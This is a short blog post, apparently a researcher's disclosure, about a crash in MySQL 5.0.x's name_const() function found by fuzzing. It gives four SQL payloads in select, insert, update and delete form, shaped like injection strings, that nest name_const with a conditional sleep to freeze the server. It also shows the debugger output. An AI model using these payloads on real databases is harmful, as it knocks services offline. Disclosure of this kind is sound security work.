MySQL name_const Crash

This is a small crash I found in MySQL 5.0.45 in the name_const function. I’ve tested this in a Windows 8 environment. However this function won’t allow performing select queries in latest versions. In older versions greater than or equal to 5.0.12 you can reproduce this issue.
I fuzzed the name_const() function and I noticed that when performing a conditional statement inside a sub query we can make the MySQL application freeze. Once we press ^c twice we get the error message.


select 1 and 1=(select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a);


insert into users 
values (20 ,'foo' and (select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a) and '','bar');


update users 
set password='foo' and (select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a) and '' where id=2;


delete from users 
where id=2 and (select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a) and ''

We can crash the MySQL server by giving input as a locally stored file too. For example:

mysql.exe –u root –p database_name < payload.sql

View post on

Additional details from the debugger:

View post on

eax=09a6ff18 ebx=00000000 ecx=a6630000 edx=00000000 esi=00000000 edi=fffffffe
eip=75388172 esp=09a6fefc ebp=09a6ff84 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
75388172 897dfc mov dword ptr [ebp-4],edi ss:002b:09a6ff80=00000000

Recommended title by exploitable: Error Code (0x40010005) starting at KERNELBASE!PathCchAddExtension+0x000000000000eeb4 (Hash=0xd874d776.0xeb23281d)

You might replicate this issue in other versions too except the latest versions starting from 5.5.x, I am not so sure about the versions.

Update: Once you perform these queries in the phpmyadmin running XAMPP the connection will be lost. You will have to restart the XAMPP server.

Leave a Reply